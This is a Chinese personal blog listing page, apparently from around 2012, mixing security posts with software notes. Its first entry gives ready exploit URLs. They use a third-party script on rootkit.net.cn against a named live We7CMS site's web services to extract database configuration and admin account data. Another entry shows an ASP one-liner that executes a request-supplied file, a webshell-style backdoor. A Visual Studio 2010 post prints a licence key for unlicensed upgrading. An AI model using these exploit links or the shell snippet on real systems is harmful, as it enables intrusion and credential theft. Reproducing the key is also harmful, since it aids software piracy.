预览模式: 普通 | 列表

We7CMS多处设计缺陷 EXP

缺陷编号: WooYun-2012-03997
漏洞标题: We7CMS多处设计缺陷
相关厂商: 西部动力
漏洞作者: kobin97
提交时间: 2012-02-01
公开时间: 2012-02-01
漏洞类型: 设计缺陷/逻辑错误
危害等级: 高
自评Rank: 10
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org/bugs/wooyun-2010-03997

PS: Do it like this , 这个程序员蛋疼呢!

Get DBConfig : http://rootkit.net.cn/exp/we7exp.aspx?getconfig=http://qy3.we7.cn/Install/InstallWebService.asmx

Get UserInfo : http://rootkit.net.cn/exp/we7exp.aspx?getuserurl=http://qy3.we7.cn/Install/AccountWebService.asmx&getusername=admin
分类:我的文档 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 86

<%
Server.execute(request("file"))

查看更多...

分类:我的文档 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 4430

更新Reverse-IP Tools

  最近BUG频出,抽点时间改进了下,算法上做了调整,虽然查询时间可能会比以前长,但是质量会提高很多,由于各方面的条件原因,Reverse-IP Tools 不支持网段批量查询,资源有限,请大家珍惜,谢谢您的支持。

查看更多...

分类:我的文档 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3492
进入:C:\Documents and Settings\当前用户名\Application Data\Mozilla\Firefox\Profiles下面有一个文件夹
一般就是default.或是以default结尾的。继续进入
找到:mimeTypes.rdf   删除.

查看更多...

分类:我的文档 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 6210

KillQQAd V1.0.0.48 For QQ2010正式版 SP2.2

V1.0.0.58

    * 增加了本地缓存功能,获取好友IP信息后,重启QQ也不会丢失

查看更多...

分类:我的文档 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 4360

MSDN VS2010 Ultimate 简体中文正式版

MSDN VS2010 Ultimate 简体中文正式版

查看更多...

分类:我的文档 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3694

IIS源码泄露及文件类型解析错误

漏洞介绍:IIS是微软推出的一款webserver,使用较为广泛,在支持asp/asp.net的同时还可以较好的支持PHP等其他语言的运行。但是80sec发现在IIS的较高版本中存在一个比较严重的安全问题,在按照网络上提供的默认配置情况下可能导致服务器泄露服务器端脚本源码,也可能错误的将任何类型的文件以PHP的方式进行解析,使得恶意的攻击者可能攻陷支持PHP的IIS服务器,特别是虚拟主机用户可能受的影响较大。

查看更多...

分类:经典收藏 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 4787

nginx文件类型错误解析漏洞



漏洞介绍:nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也可以非常好的支持PHP的运行。80sec发现其中存在一个较为严重的安全问题,默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持php的nginx服务器。

查看更多...

分类:经典收藏 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2693
错误页面如下,出现这个问题,很大的可能是在iis中没有正确的配置WCF服务,解决的办法也很简单
使用 %Windows%\Microsoft.Net\Framework\v3.0\Windows Communication Foundation目录下的ServiceModelReg.exe程序就好了

查看更多...

分类:学习笔记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3129
Visual Studio是微软公司推出的目前最为流行的Windows平台应用程序开发环境。从Visual Studio的第一个版本开始,微软就将提高开发人员的工作效率和灵活性作为研发目标。使用具有更多新特性的最新版本Visual Studio 2010,即可非常有效地在新一代应用平台上为客户创造令人惊奇的解决方案。现提供Visual Studio 2010专业、高级、旗舰三个版本的简要介绍、官方下载,以及旗舰版升级密钥如下——

    Visual Studio 2010具有五大特性:支持云计算架构;Agile/Scrum开发方法;兼容Windows 7与Silverlight 4;发挥多核并行运算威力;能够更好地支持C++。


(一)专业版

    面向个人开发人员提供集成开发环境、开发平台支持以及测试工具等。其中带有MSDN Essential(有效期一年的MSDN订阅)的完整版售价799美元、升级版售价549美元;带有MSDN订阅的完整版售价1199美元、升级版售价 799美元。

    微软官方下载地址:Microsoft Visual Studio 2010 Professional - ISO

(二)高级版

    创建可扩展、高质量程序的完整工具包,相比专业版增加了数据库开发、Team Foundation Server(TFS)、调试与诊断、程序生命周期管理(ALM)。完整版售价5469美元,升级版售价2299美元。

    微软官方下载地址:Microsoft Visual Studio 2010 Premium - ISO

(三)旗舰版

    面向开发团队的综合性ALM工具,相比高级版增加了架构与建模、实验室管理等。完整版售价11899美元,升级版售价3799美元。

    微软官方下载地址:Microsoft Visual Studio 2010 Ultimate - ISO

    安装完毕后,在卸载程序中进入维护模式,用YCFHQ-9DWCY-DKV88-T2TMH-G7BHP升级即可。

附一:Microsoft .NET Framework 4(Web Installer) 微 软官方下载地址

    提供了对更多业界标准、语言选项的支持。新增支持包括并行编程在内的高性能中间层应用。Microsoft .NET Framework 4可与Microsoft .NET Framework 3.5并存。

附二:Microsoft Visual C++ 2010 Redistributable Package 微 软官方下载地址

    本程序包为C运行时库(CRT)、标准C++、ATL、MFC、OpenMP和MSDIA库安装运行时组件。对于支持并行部署模型的库(CRT、SCL、 ATL、MFC、OpenMP),这些运行时组件被安装到:支持并行程序集的Windows操作系统的本机程序集缓存(也称为 WinSxS文件夹)中。
分类:经典收藏 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3131

Path.Combine() 方法

string path1 = @"F:\WEB\aspx\";
string path2 = @"c:\";
string path = Path.Combine(path1,path2);

查看更多...

分类:学习笔记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3186

我的服务器

  服务器换了好几个地方了,现在的这个时间是比较久的,感谢朋友的大力支持,当然也少不了大小国际黑客的拜访,能拿到权限的我佩服的五体投地,还有些蛋疼的兄台在那D来D去,有这时间还不如学学人家"Iranian Cyber Army"。发两个图片娱乐下。

我的服务器上还有一个朋友的私服网站。看看里面有多少SHELL。去年10月之前我删除过一批

查看更多...

分类:淫声如梦 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 9761